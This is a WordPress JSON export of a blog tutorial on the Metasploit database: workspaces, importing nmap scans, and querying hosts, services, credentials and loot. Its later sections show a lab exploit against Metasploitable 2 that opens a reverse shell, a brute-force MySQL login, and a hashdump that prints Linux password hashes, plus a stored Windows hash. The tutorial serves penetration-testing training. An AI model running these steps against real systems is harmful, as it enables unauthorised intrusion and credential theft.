{"id":475,"date":"2018-06-05T15:46:26","date_gmt":"2018-06-05T15:46:26","guid":{"rendered":"http:\/\/www.asianux.org.vn\/?p=475"},"modified":"2018-06-06T10:12:19","modified_gmt":"2018-06-06T10:12:19","slug":"using-the-database-in-metasploit","status":"publish","type":"post","link":"https:\/\/www.asianux.org.vn\/index.php\/2018\/06\/05\/using-the-database-in-metasploit\/","title":{"rendered":"Using the Database in Metasploit"},"content":{"rendered":"<h2><span id=\"Setup\" class=\"mw-headline\">Setting up our Metasploit Database<\/span><\/h2>\n<p>In Kali, you will need to start up the\u00a0<b>postgresql<\/b>\u00a0server before using the database.<\/p>\n<pre id=\"pre-msfu\">root@kali:~# systemctl start postgresql\r\n<\/pre>\n<p>After starting\u00a0<b>postgresql<\/b>\u00a0you need to create and initialize the\u00a0<b>msf<\/b>\u00a0database with\u00a0<b>msfdb init<\/b>.<\/p>\n<pre id=\"pre-msfu\">root@kali:~# msfdb init\r\nCreating database user 'msf'\r\nEnter password for new role: \r\nEnter it again: \r\nCreating databases 'msf' and 'msf_test'\r\nCreating configuration file in \/usr\/share\/metasploit-framework\/config\/database.yml\r\nCreating initial database schema\r\n<\/pre>\n<h2><span id=\"Workspaces\" class=\"mw-headline\">Using Workspaces in Metasploit<\/span><\/h2>\n<p>When we load up msfconsole and run \u2018<strong>db_status<\/strong>\u2019, we can confirm that Metasploit is successfully connected to the database.<\/p>\n<pre id=\"pre-msfu\">msf &gt; db_status \r\n[*] postgresql connected to msf\r\n<\/pre>\n<p>This capability is meant to keep\u00a0track of our activities and scans in order, so it\u2019s imperative we start off on the right foot. Once connected to the database, we can start organizing our different movements by using what are called \u2018workspaces\u2019. 
This gives us the ability to save different scans from different locations\/networks\/subnets, for example.<\/p>\n<p>Issuing the \u2018<strong>workspace<\/strong>\u2019 command from the\u00a0<strong>msfconsole<\/strong> will list the available workspaces. The \u2018<strong>default<\/strong>\u2019 workspace is selected when connecting to the database, as shown by the * beside its name.<\/p>\n<pre id=\"pre-msfu\">msf &gt; workspace\r\n* default\r\n  msfu\r\n  lab1\r\n  lab2\r\n  lab3\r\n  lab4\r\nmsf &gt; \r\n<\/pre>\n<p>As we can see, this can be quite handy when it comes to keeping things \u2018neat\u2019. Let\u2019s change the current workspace to \u2018msfu\u2019.<\/p>\n<pre id=\"pre-msfu\">msf &gt; workspace msfu\r\n[*] Workspace: msfu\r\nmsf &gt; workspace\r\n  default\r\n* msfu\r\n  lab1\r\n  lab2\r\n  lab3\r\n  lab4\r\nmsf &gt; \r\n<\/pre>\n<p>To create or delete a workspace, one simply uses the \u2018<strong>-a<\/strong>\u2019 or \u2018<strong>-d<\/strong>\u2019 switch followed by the name at the msfconsole prompt.<\/p>\n<pre id=\"pre-msfu\">msf &gt; workspace -a lab4\r\n[*] Added workspace: lab4\r\nmsf &gt; \r\n\r\n\r\nmsf &gt; workspace -d lab4 \r\n[*] Deleted workspace: lab4\r\nmsf &gt; workspace\r\n<\/pre>\n<p>It\u2019s that simple. Using the same command with the \u2018<strong>-h<\/strong>\u2019 switch will show the command\u2019s other capabilities.<\/p>\n<pre id=\"pre-msfu\"> \r\nmsf &gt; workspace -h\r\nUsage:\r\n    workspace                  List workspaces\r\n    workspace -v               List workspaces verbosely\r\n    workspace [name]           Switch workspace\r\n    workspace -a [name] ...    Add workspace(s)\r\n    workspace -d [name] ...    
Delete workspace(s)\r\n    workspace -D               Delete all workspaces\r\n    workspace -r     Rename workspace\r\n    workspace -h               Show this help information\r\n\r\nmsf &gt; \r\n<\/pre>\n<p>From now on, any scans or imports from third-party applications will be saved into this workspace.<\/p>\n<p>Now that we are connected to our database and have our workspace set up, let\u2019s look at populating it with some data. First we\u2019ll look at the different \u2018db_\u2019 commands available to us, using the \u2018help\u2019 command from the msfconsole.<\/p>\n<pre id=\"pre-msfu\">msf &gt; help\r\n...snip...\r\n\r\nDatabase Backend Commands\r\n=========================\r\n\r\n    Command           Description\r\n    -------           -----------\r\n    creds             List all credentials in the database\r\n    db_connect        Connect to an existing database\r\n    db_disconnect     Disconnect from the current database instance\r\n    db_export         Export a file containing the contents of the database\r\n    db_import         Import a scan result file (filetype will be auto-detected)\r\n    db_nmap           Executes nmap and records the output automatically\r\n    db_rebuild_cache  Rebuilds the database-stored module cache\r\n    db_status         Show the current database status\r\n    hosts             List all hosts in the database\r\n    loot              List all loot in the database\r\n    notes             List all notes in the database\r\n    services          List all services in the database\r\n    vulns             List all vulnerabilities in the database\r\n    workspace         Switch between database workspaces\r\n\r\n<\/pre>\n<h2><span id=\"Importing_.26_Scanning\" class=\"mw-headline\">Importing and Scanning<\/span><\/h2>\n<p>There are several ways to do this, from scanning a host or network directly from the console to importing a file from an earlier scan. 
Let\u2019s start by importing an nmap scan of the \u2018metasploitable 2\u2019 host. This is done using the \u2018<strong>db_import<\/strong>\u2019 command followed by the path to our file.<\/p>\n<pre id=\"pre-msfu\">msf &gt;  db_import \/root\/msfu\/nmapScan \r\n[*] Importing 'Nmap XML' data\r\n[*] Import: Parsing with 'Rex::Parser::NmapXMLStreamParser'\r\n[*] Importing host 172.16.194.172\r\n[*] Successfully imported \/root\/msfu\/nmapScan\r\nmsf &gt; hosts\r\n\r\nHosts\r\n=====\r\n\r\naddress         mac                name  os_name  os_flavor  os_sp  purpose  info  comments\r\n-------         ---                ----  -------  ---------  -----  -------  ----  --------\r\n172.16.194.172  00:0C:29:D1:62:80        Linux    Ubuntu            server         \r\n\r\nmsf &gt; \r\n<\/pre>\n<p>Once completed, we can confirm the import by issuing the \u2018hosts\u2019 command. This will display all the hosts stored in our current workspace. We can also scan a host directly from the console using the \u2018db_nmap\u2019 command. Scan results will be saved in our current database. The command works the same way as the command-line version of \u2018nmap\u2019.<\/p>\n<pre id=\"pre-msfu\">msf &gt; db_nmap -A 172.16.194.134\r\n[*] Nmap: Starting Nmap 5.51SVN ( http:\/\/nmap.org ) at 2012-06-18 12:36 EDT\r\n[*] Nmap: Nmap scan report for 172.16.194.134\r\n[*] Nmap: Host is up (0.00031s latency).\r\n[*] Nmap: Not shown: 994 closed ports\r\n[*] Nmap: PORT     STATE SERVICE      VERSION\r\n[*] Nmap: 80\/tcp   open  http         Apache httpd 2.2.17 ((Win32) mod_ssl\/2.2.17 OpenSSL\/0.9.8o PHP\/5.3.4 \r\n\r\n...snip...\r\n\r\n[*] Nmap: HOP RTT     ADDRESS\r\n[*] Nmap: 1   0.31 ms 172.16.194.134\r\n[*] Nmap: OS and Service detection performed. 
Please report any incorrect results at http:\/\/nmap.org\/submit\/ .\r\n[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 14.91 seconds\r\nmsf &gt;\r\n\r\n\r\nmsf &gt; hosts\r\n\r\nHosts\r\n=====\r\n\r\naddress         mac                name  os_name            os_flavor  os_sp  purpose  info  comments\r\n-------         ---                ----  -------            ---------  -----  -------  ----  --------\r\n172.16.194.134  00:0C:29:68:51:BB        Microsoft Windows  XP                server         \r\n172.16.194.172  00:0C:29:D1:62:80        Linux              Ubuntu            server         \r\n\r\nmsf &gt; \r\n<\/pre>\n<h2><span id=\"Backing_Up\" class=\"mw-headline\">Backing Up Our Data<\/span><\/h2>\n<p>Exporting our data outside the Metasploit environment is very simple. Using the \u2018<strong>db_export<\/strong>\u2019 command, all our gathered information can be saved in an XML file. This format can be easily used and manipulated later for reporting purposes. The command has two output formats: the \u2018<strong>xml<\/strong>\u2019 format, which exports all of the information currently stored in our active workspace, and the \u2018<strong>pwdump<\/strong>\u2019 format, which exports everything related to used\/gathered credentials.<\/p>\n<pre id=\"pre-msfu\">msf &gt;  db_export -h\r\nUsage:\r\n    db_export -f  [-a] [filename]\r\n    Format can be one of: xml, pwdump\r\n[-] No output file was specified\r\n\r\nmsf &gt; db_export -f xml \/root\/msfu\/Exported.xml\r\n[*] Starting export of workspace msfu to \/root\/msfu\/Exported.xml [ xml ]...\r\n[*]     &gt;&gt; Starting export of report\r\n[*]     &gt;&gt; Starting export of hosts\r\n[*]     &gt;&gt; Starting export of events\r\n[*]     &gt;&gt; Starting export of services\r\n[*]     &gt;&gt; Starting export of credentials\r\n[*]     &gt;&gt; Starting export of web sites\r\n[*]     &gt;&gt; Starting export of web pages\r\n[*]     &gt;&gt; Starting export of web forms\r\n[*]     &gt;&gt; Starting export of 
web vulns\r\n[*]     &gt;&gt; Finished export of report\r\n[*] Finished export of workspace msfu to \/root\/msfu\/Exported.xml [ xml ]...\r\n\r\n\r\n<\/pre>\n<h2><span id=\"Hosts\" class=\"mw-headline\">Using the Hosts Command<\/span><\/h2>\n<p>Now that we can import and export information to and from our database, let us look at how we can use this information within the msfconsole. Many commands are available to search for specific information stored in our database: host names, addresses, discovered services and so on. We can even use the resulting data to populate module settings such as RHOSTS. We\u2019ll look at how this is done a bit later.<\/p>\n<p>The \u2018<strong>hosts<\/strong>\u2019 command was used earlier to confirm the presence of data in our database. Let\u2019s look at the different options available and see how we can use it to get quick and useful information. Issuing the command with \u2018-h\u2019 will display the help menu.<\/p>\n<pre id=\"pre-msfu\">msf &gt; hosts -h\r\nUsage: hosts [ options ] [addr1 addr2 ...]\r\n\r\nOPTIONS:\r\n  -a,--add          Add the hosts instead of searching\r\n  -d,--delete       Delete the hosts instead of searching\r\n  -c &lt;col1,col2&gt;    Only show the given columns (see list below)\r\n  -h,--help         Show this help information\r\n  -u,--up           Only show hosts which are up\r\n  -o          Send output to a file in csv format\r\n  -O        Order rows by specified column number\r\n  -R,--rhosts       Set RHOSTS from the results of the search\r\n  -S,--search       Search string to filter by\r\n  -i,--info         Change the info of a host\r\n  -n,--name         Change the name of a host\r\n  -m,--comment      Change the comment of a host\r\n  -t,--tag          Add or specify a tag to a range of hosts\r\n\r\nAvailable columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, 
os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags\r\n\r\n<\/pre>\n<p>We\u2019ll start by asking the \u2018<strong>hosts<\/strong>\u2019 command to display only the IP address and OS type using the \u2018<strong>-c<\/strong>\u2019 switch.<\/p>\n<pre id=\"pre-msfu\">msf &gt; hosts -c address,os_flavor\r\n\r\nHosts\r\n=====\r\n\r\naddress         os_flavor\r\n-------         ---------\r\n172.16.194.134  XP\r\n172.16.194.172  Ubuntu\r\n\r\n<\/pre>\n<h2><span id=\"Setting_up_Modules\" class=\"mw-headline\">Setting up Modules<\/span><\/h2>\n<p>Another interesting feature available to us is the ability to search all our entries for something specific. Imagine we wished to find only the Linux-based machines from our scan. For this we\u2019d use the \u2018<strong>-S<\/strong>\u2019 option. This option can be combined with our previous example to help fine-tune our results.<\/p>\n<pre id=\"pre-msfu\">msf &gt; hosts -c address,os_flavor -S Linux\r\n\r\nHosts\r\n=====\r\n\r\naddress         os_flavor\r\n-------         ---------\r\n172.16.194.172  Ubuntu\r\n\r\nmsf &gt;\r\n\r\n<\/pre>\n<p>Using the output of our previous example, we\u2019ll feed that into the \u2018tcp\u2019 scan auxiliary module.<\/p>\n<pre id=\"pre-msfu\">msf  auxiliary(tcp) &gt; show options\r\n\r\nModule options (auxiliary\/scanner\/portscan\/tcp):\r\n\r\n   Name         Current Setting  Required  Description\r\n   ----         ---------------  --------  -----------\r\n   CONCURRENCY  10               yes       The number of concurrent ports to check per host\r\n   FILTER                        no        The filter string for capturing traffic\r\n   INTERFACE                     no        The name of the interface\r\n   PCAPFILE                      no        The name of the PCAP capture file to process\r\n   PORTS        1-10000          yes       Ports to scan (e.g. 
22-25,80,110-900)\r\n   RHOSTS                        yes       The target address range or CIDR identifier\r\n   SNAPLEN      65535            yes       The number of bytes to capture\r\n   THREADS      1                yes       The number of concurrent threads\r\n   TIMEOUT      1000             yes       The socket connect timeout in milliseconds\r\n\r\n<\/pre>\n<p>We can see that by default nothing is set in \u2018<strong>RHOSTS<\/strong>\u2019. We\u2019ll add the \u2018<strong>-R<\/strong>\u2019 switch to the hosts command and run the module; hopefully it will run and scan our target without any problems.<\/p>\n<pre id=\"pre-msfu\">msf  auxiliary(tcp) &gt; hosts -c address,os_flavor -S Linux -R\r\n\r\nHosts\r\n=====\r\n\r\naddress         os_flavor\r\n-------         ---------\r\n172.16.194.172  Ubuntu\r\n\r\nRHOSTS =&gt; 172.16.194.172\r\n\r\nmsf  auxiliary(tcp) &gt; run\r\n\r\n[*] 172.16.194.172:25 - TCP OPEN\r\n[*] 172.16.194.172:23 - TCP OPEN\r\n[*] 172.16.194.172:22 - TCP OPEN\r\n[*] 172.16.194.172:21 - TCP OPEN\r\n[*] 172.16.194.172:53 - TCP OPEN\r\n[*] 172.16.194.172:80 - TCP OPEN\r\n\r\n...snip...\r\n\r\n[*] 172.16.194.172:5432 - TCP OPEN\r\n[*] 172.16.194.172:5900 - TCP OPEN\r\n[*] 172.16.194.172:6000 - TCP OPEN\r\n[*] 172.16.194.172:6667 - TCP OPEN\r\n[*] 172.16.194.172:6697 - TCP OPEN\r\n[*] 172.16.194.172:8009 - TCP OPEN\r\n[*] 172.16.194.172:8180 - TCP OPEN\r\n[*] 172.16.194.172:8787 - TCP OPEN\r\n[*] Scanned 1 of 1 hosts (100% complete)\r\n[*] Auxiliary module execution completed\r\n\r\n<\/pre>\n<p>Of course, this also works if our results contain more than one address.<\/p>\n<pre id=\"pre-msfu\">msf  auxiliary(tcp) &gt; hosts -R\r\n\r\nHosts\r\n=====\r\n\r\naddress         mac                name  os_name            os_flavor  os_sp  purpose  info  comments\r\n-------         ---                ----  -------            ---------  -----  -------  ----  --------\r\n172.16.194.134  00:0C:29:68:51:BB        Microsoft Windows  XP                server    
     \r\n172.16.194.172  00:0C:29:D1:62:80        Linux              Ubuntu            server         \r\n\r\nRHOSTS =&gt; 172.16.194.134 172.16.194.172\r\n\r\nmsf  auxiliary(tcp) &gt; show options\r\n\r\nModule options (auxiliary\/scanner\/portscan\/tcp):\r\n\r\n   Name         Current Setting                Required  Description\r\n   ----         ---------------                --------  -----------\r\n   CONCURRENCY  10                             yes       The number of concurrent ports to check per host\r\n   FILTER                                      no        The filter string for capturing traffic\r\n   INTERFACE                                   no        The name of the interface\r\n   PCAPFILE                                    no        The name of the PCAP capture file to process\r\n   PORTS        1-10000                        yes       Ports to scan (e.g. 22-25,80,110-900)\r\n   RHOSTS       172.16.194.134 172.16.194.172  yes       The target address range or CIDR identifier\r\n   SNAPLEN      65535                          yes       The number of bytes to capture\r\n   THREADS      1                              yes       The number of concurrent threads\r\n   TIMEOUT      1000                           yes       The socket connect timeout in milliseconds\r\n\r\n<\/pre>\n<p>You can see how useful this may be if our database contained hundreds of entries. We could search for Windows machines only, then set the RHOSTS option for the smb_version auxiliary module very quickly. The \u2018-R\u2019 switch for setting RHOSTS is available in almost all of the commands that interact with the database.<\/p>\n<h2><span id=\"Services\" class=\"mw-headline\">Services<\/span><\/h2>\n<p>Another\u00a0way to search the database is by using the \u2018<strong>services<\/strong>\u2019 command. 
Like the previous examples, we can extract very specific information with little effort.<\/p>\n<pre id=\"pre-msfu\"> \r\nmsf &gt; services -h\r\n\r\nUsage: services [-h] [-u] [-a] [-r ] [-p &gt;port1,port2&gt;] [-s &gt;name1,name2&gt;] [-o ] [addr1 addr2 ...]\r\n\r\n  -a,--add          Add the services instead of searching\r\n  -d,--delete       Delete the services instead of searching\r\n  -c &lt;col1,col2&gt;    Only show the given columns\r\n  -h,--help         Show this help information\r\n  -s &lt;name1,name2&gt;  Search for a list of service names\r\n  -p &lt;port1,port2&gt;  Search for a list of ports\r\n  -r      Only show [tcp|udp] services\r\n  -u,--up           Only show services which are up\r\n  -o          Send output to a file in csv format\r\n  -R,--rhosts       Set RHOSTS from the results of the search\r\n  -S,--search       Search string to filter by\r\n\r\nAvailable columns: created_at, info, name, port, proto, state, updated_at\r\n\r\n<\/pre>\n<p>Much in the same way as the hosts command, we can specify which fields are displayed. 
Coupled with the \u2018<strong>-S<\/strong>\u2019 switch, we can also search for a service containing a particular string.<\/p>\n<pre id=\"pre-msfu\">msf &gt; services -c name,info 172.16.194.134\r\n\r\nServices\r\n========\r\n\r\nhost            name          info\r\n----            ----          ----\r\n172.16.194.134  http          Apache httpd 2.2.17 (Win32) mod_ssl\/2.2.17 OpenSSL\/0.9.8o PHP\/5.3.4 mod_perl\/2.0.4 Perl\/v5.10.1 \r\n172.16.194.134  msrpc         Microsoft Windows RPC \r\n172.16.194.134  netbios-ssn   \r\n172.16.194.134  http          Apache httpd 2.2.17 (Win32) mod_ssl\/2.2.17 OpenSSL\/0.9.8o PHP\/5.3.4 mod_perl\/2.0.4 Perl\/v5.10.1 \r\n172.16.194.134  microsoft-ds  Microsoft Windows XP microsoft-ds \r\n172.16.194.134  mysql \r\n\r\n<\/pre>\n<p>Here we are searching all hosts contained in our database for a service name containing the string \u2018http\u2019.<\/p>\n<pre id=\"pre-msfu\">msf &gt; services -c name,info -S http\r\n\r\nServices\r\n========\r\n\r\nhost            name  info\r\n----            ----  ----\r\n172.16.194.134  http  Apache httpd 2.2.17 (Win32) mod_ssl\/2.2.17 OpenSSL\/0.9.8o PHP\/5.3.4 mod_perl\/2.0.4 Perl\/v5.10.1 \r\n172.16.194.134  http  Apache httpd 2.2.17 (Win32) mod_ssl\/2.2.17 OpenSSL\/0.9.8o PHP\/5.3.4 mod_perl\/2.0.4 Perl\/v5.10.1 \r\n172.16.194.172  http  Apache httpd 2.2.8 (Ubuntu) DAV\/2 \r\n172.16.194.172  http  Apache Tomcat\/Coyote JSP engine 1.1 \r\n\r\n<\/pre>\n<p>The possible search combinations are enormous: specific ports or port ranges, full or partial service names with the \u2018-s\u2019 or \u2018-S\u2019 switches, all hosts or just a select few\u2026 The list goes on and on. 
Here are a few examples, but you may need to experiment with these features in order to get what you want and need out of your searches.<\/p>\n<pre id=\"pre-msfu\">msf &gt; services -c info,name -p 445\r\n\r\nServices\r\n========\r\n\r\nhost            info                                  name\r\n----            ----                                  ----\r\n172.16.194.134  Microsoft Windows XP microsoft-ds     microsoft-ds\r\n172.16.194.172  Samba smbd 3.X workgroup: WORKGROUP   netbios-ssn\r\n\r\n<\/pre>\n<hr \/>\n<pre id=\"pre-msfu\">msf &gt; services -c port,proto,state -p 70-81\r\nServices\r\n========\r\nhost           port proto state\r\n----           ---- ----- -----\r\n172.16.194.134 80   tcp   open\r\n172.16.194.172 75   tcp   closed\r\n172.16.194.172 71   tcp   closed\r\n172.16.194.172 72   tcp   closed\r\n172.16.194.172 73   tcp   closed\r\n172.16.194.172 74   tcp   closed\r\n172.16.194.172 70   tcp   closed\r\n172.16.194.172 76   tcp   closed\r\n172.16.194.172 77   tcp   closed\r\n172.16.194.172 78   tcp   closed\r\n172.16.194.172 79   tcp   closed\r\n172.16.194.172 80   tcp   open\r\n172.16.194.172 81   tcp   closed\r\n<\/pre>\n<hr \/>\n<pre id=\"pre-msfu\">msf &gt; services -s http -c port 172.16.194.134\r\nServices\r\n========\r\nhost           port\r\n----           ----\r\n172.16.194.134 80\r\n172.16.194.134 443\r\n<\/pre>\n<hr \/>\n<pre id=\"pre-msfu\">msf &gt; services -S Unr\r\nServices\r\n========\r\nhost           port proto name state info\r\n----           ---- ----- ---- ----- ----\r\n172.16.194.172 6667 tcp   irc  open  Unreal ircd\r\n172.16.194.172 6697 tcp   irc  open  Unreal ircd\r\n<\/pre>\n<h2><span id=\"CSV_Export\" class=\"mw-headline\">CSV Export<\/span><\/h2>\n<p>Both the hosts and services commands give us a means of saving our query results into a file. The file format is comma-separated values, or CSV. 
Adding the \u2018-o\u2019 switch with a path and filename saves the information that would otherwise be displayed on the screen to disk.<\/p>\n<pre id=\"pre-msfu\">msf &gt; services -s http -c port 172.16.194.134 -o \/root\/msfu\/http.csv\r\n\r\n[*] Wrote services to \/root\/msfu\/http.csv\r\n\r\nmsf &gt; hosts -S Linux -o \/root\/msfu\/linux.csv\r\n[*] Wrote hosts to \/root\/msfu\/linux.csv\r\n\r\nmsf &gt; cat \/root\/msfu\/linux.csv\r\n[*] exec: cat \/root\/msfu\/linux.csv\r\n\r\naddress,mac,name,os_name,os_flavor,os_sp,purpose,info,comments\r\n\"172.16.194.172\",\"00:0C:29:D1:62:80\",\"\",\"Linux\",\"Debian\",\"\",\"server\",\"\",\"\"\r\n\r\nmsf &gt; cat \/root\/msfu\/http.csv\r\n[*] exec: cat \/root\/msfu\/http.csv\r\n\r\nhost,port\r\n\"172.16.194.134\",\"80\"\r\n\"172.16.194.134\",\"443\"\r\n\r\n<\/pre>\n<h2><span id=\"Creds\" class=\"mw-headline\">Creds<\/span><\/h2>\n<p>The \u2018creds\u2019 command is used to manage found and used credentials for targets in our database. Running this command without any options will display the currently saved credentials.<\/p>\n<pre id=\"pre-msfu\">msf &gt; creds\r\n\r\nCredentials\r\n===========\r\n\r\nhost  port  user  pass  type  active?\r\n----  ----  ----  ----  ----  -------\r\n\r\n[*] Found 0 credentials.\r\n\r\n<\/pre>\n<p>As with the \u2018<strong>db_nmap<\/strong>\u2019 command, successful results relating to credentials will be automatically saved to our active workspace. 
Let\u2019s run the auxiliary module \u2018<strong>mysql_login<\/strong>\u2019 and see what happens when Metasploit scans our server.<\/p>\n<pre id=\"pre-msfu\">msf  auxiliary(mysql_login) &gt; run\r\n\r\n[*] 172.16.194.172:3306 MYSQL - Found remote MySQL version 5.0.51a\r\n[*] 172.16.194.172:3306 MYSQL - [1\/2] - Trying username:'root' with password:''\r\n[*] 172.16.194.172:3306 - SUCCESSFUL LOGIN 'root' : ''\r\n[*] Scanned 1 of 1 hosts (100% complete)\r\n[*] Auxiliary module execution completed\r\n\r\n\r\nmsf  auxiliary(mysql_login) &gt; creds \r\n\r\nCredentials\r\n===========\r\n\r\nhost            port  user  pass  type      active?\r\n----            ----  ----  ----  ----      -------\r\n172.16.194.172  3306  root        password  true\r\n\r\n[*] Found 1 credential.\r\nmsf  auxiliary(mysql_login) &gt;\r\n<\/pre>\n<p>We can see the module was able to connect to our MySQL server, and because of this Metasploit automatically saved the credentials in our database for future reference.<\/p>\n<p>During post-exploitation of a host, gathering user credentials is an important activity in order to further penetrate a target network. 
As we gather sets of credentials, we can add them to our database with the \u2018creds -a\u2019 command.<\/p>\n<pre id=\"pre-msfu\">msf &gt; creds -a 172.16.194.134 -p 445 -u Administrator -P 7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::\r\n[*] Time: 2012-06-20 20:31:42 UTC Credential: host=172.16.194.134 port=445 proto=tcp sname= type=password user=Administrator pass=7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true\r\n\r\nmsf &gt; creds\r\n\r\nCredentials\r\n===========\r\n\r\nhost            port  user           pass                                                                  type      active?\r\n----            ----  ----           ----                                                                  ----      -------\r\n172.16.194.134  445   Administrator  7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::  password  true\r\n\r\n[*] Found 1 credential.\r\n\r\n\r\n<\/pre>\n<h2><span id=\"Loot\" class=\"mw-headline\">Loot<\/span><\/h2>\n<p>Once you\u2019ve compromised a system (or three), one of the objectives may be to retrieve hash dumps from either a Windows or *nix system. In the event of a successful hash dump, this information will be stored in our database. We can view these dumps using the \u2018loot\u2019 command. As with almost every command, adding the \u2018-h\u2019 switch will display a little more information.<\/p>\n<pre id=\"pre-msfu\">msf &gt; loot -h\r\nUsage: loot\r\n Info: loot [-h] [addr1 addr2 ...] [-t &lt;type1,type2&gt;]\r\n  Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] 
[-t [type]\r\n  Del: loot -d [addr1 addr2 ...]\r\n\r\n  -a,--add          Add loot to the list of addresses, instead of listing\r\n  -d,--delete       Delete *all* loot matching host and type\r\n  -f,--file         File with contents of the loot to add\r\n  -i,--info         Info of the loot to add\r\n  -t &lt;type1,type2&gt;  Search for a list of types\r\n  -h,--help         Show this help information\r\n  -S,--search       Search string to filter by\r\n<\/pre>\n<p>Here\u2019s an example of how one would populate the database with some \u2018loot\u2019.<\/p>\n<pre id=\"pre-msfu\">msf  exploit(usermap_script) &gt; exploit\r\n\r\n[*] Started reverse double handler\r\n[*] Accepted the first client connection...\r\n[*] Accepted the second client connection...\r\n[*] Command: echo 4uGPYOrars5OojdL;\r\n[*] Writing to socket A\r\n[*] Writing to socket B\r\n[*] Reading from sockets...\r\n[*] Reading from socket B\r\n[*] B: \"4uGPYOrars5OojdL\\r\\n\"\r\n[*] Matching...\r\n[*] A is input...\r\n[*] Command shell session 1 opened (172.16.194.163:4444 -&gt; 172.16.194.172:55138) at 2012-06-27 19:38:54 -0400\r\n\r\n^Z\r\nBackground session 1? 
[y\/N]  y\r\n\r\nmsf  exploit(usermap_script) &gt; use post\/linux\/gather\/hashdump\r\nmsf  post(hashdump) &gt; show options\r\n\r\nModule options (post\/linux\/gather\/hashdump):\r\n\r\n   Name     Current Setting  Required  Description\r\n   ----     ---------------  --------  -----------\r\n   SESSION  1                yes       The session to run this module on.\r\n\r\nmsf  post(hashdump) &gt; sessions -l\r\n\r\nActive sessions\r\n===============\r\n\r\n  Id  Type        Information  Connection\r\n  --  ----        -----------  ----------\r\n  1   shell unix               172.16.194.163:4444 -&gt; 172.16.194.172:55138 (172.16.194.172)\r\n\r\nmsf  post(hashdump) &gt; run\r\n\r\n[+] root:$1$\/avpfBJ1$x0z8w5UF9Iv.\/DR9E9Lid.:0:0:root:\/root:\/bin\/bash\r\n[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:\/dev:\/bin\/sh\r\n[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::\/home\/klog:\/bin\/false\r\n[+] msfadmin:$1$XN10Zj2c$Rt\/zzCW3mLtUWA.ihZjA5\/:1000:1000:msfadmin,,,:\/home\/msfadmin:\/bin\/bash\r\n[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe\/:108:117:PostgreSQL administrator,,,:\/var\/lib\/postgresql:\/bin\/bash\r\n[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:\/home\/user:\/bin\/bash\r\n[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu\/\/:1002:1002:,,,:\/home\/service:\/bin\/bash\r\n[+] Unshadowed Password File: \/root\/.msf4\/loot\/20120627193921_msfu_172.16.194.172_linux.hashes_264208.txt\r\n[*] Post module execution completed\r\n\r\n\r\n\r\nmsf  post(hashdump) &gt; loot\r\n\r\nLoot\r\n====\r\n\r\nhost            service  type          name                   content     info                            path\r\n----            -------  ----          ----                   -------     ----                            ----\r\n172.16.194.172           linux.hashes  unshadowed_passwd.pwd  text\/plain  Linux Unshadowed Password File  \/root\/.msf4\/loot\/20120627193921_msfu_172.16.194.172_linux.hashes_264208.txt\r\n172.16.194.172      
     linux.passwd  passwd.tx              text\/plain  Linux Passwd File               \/root\/.msf4\/loot\/20120627193921_msfu_172.16.194.172_linux.passwd_953644.txt\r\n172.16.194.172           linux.shadow  shadow.tx              text\/plain  Linux Password Shadow File      \/root\/.msf4\/loot\/20120627193921_msfu_172.16.194.172_linux.shadow_492948.txt\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Setup our Metasploit Database In Kali, you will need to start up the\u00a0postgresql\u00a0server before using the database. root@kali:~# systemctl start postgresql After starting\u00a0postgresql\u00a0you need to create and initialize the\u00a0msf\u00a0database with\u00a0msfdb init root@kali:~# msfdb init Creating&hellip;<\/p>\n","protected":false},"author":1,"featured_media":487,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-475","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-pentest"],"_links":{"self":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts\/475","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/comments?post=475"}],"version-history":[{"count":1,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts\/475\/revisions"}],"predecessor-version":[{"id":476,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts\/475\/revisions\/476"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/media\/487"}],"wp:attachment":[{"
href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/media?parent=475"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/categories?post=475"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/tags?post=475"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}